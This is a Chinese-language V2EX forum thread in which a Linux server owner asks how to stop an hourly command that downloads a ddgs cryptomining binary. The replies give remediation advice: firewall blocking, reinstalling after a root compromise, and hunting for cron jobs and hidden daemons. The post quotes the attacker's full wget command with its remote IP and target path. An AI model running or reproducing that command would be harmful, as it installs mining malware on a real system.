求助，每小时被执行恶意下载挖矿程序 wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee 求大佬

2020-04-18 11:15:18 +08:00

ying5201314

wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
ip 103.27.42.76 是日本
每小时执行的恶意命令，如何找到执行的文件在位置，或者是不要他运行，wget 能卸载么
没有找到定时任务

4993 次点击

所在节点

Linux

27 条回复

patx

2020-04-18 19:43:31 +08:00

发到全球 ddos 论坛上去

JustSong

2020-04-19 00:21:38 +08:00

可以用防火墙进行限制么

Hades300

2020-04-19 07:13:04 +08:00

用 iptables drop 包就完事了

msg7086

2020-04-19 17:49:41 +08:00

既然能写入 /usr/bin，那说明别人已经拿到了 root 权限，那从内核到系统文件，所有的程序都可能会被换掉，你不重装难道留着过劳动节么。

realpg

2020-04-19 22:00:41 +08:00

我猜你是 centos

cnzjl

2020-04-20 09:42:08 +08:00

@Rxianbei 排查下 cup 占用高的进程, 看看有没有可疑的 vbs 脚本,是否为远程下载的脚本~

zhao305149619

2020-04-21 13:40:01 +08:00

这种一般有 cron 的定时脚本，还有就是会有一个低 cpu 利用率的 deamon 的进程不易被发现，所以有时候发现把 cron 停掉之后过一会还是会出现。

第 2 页／共 2 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/663696

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.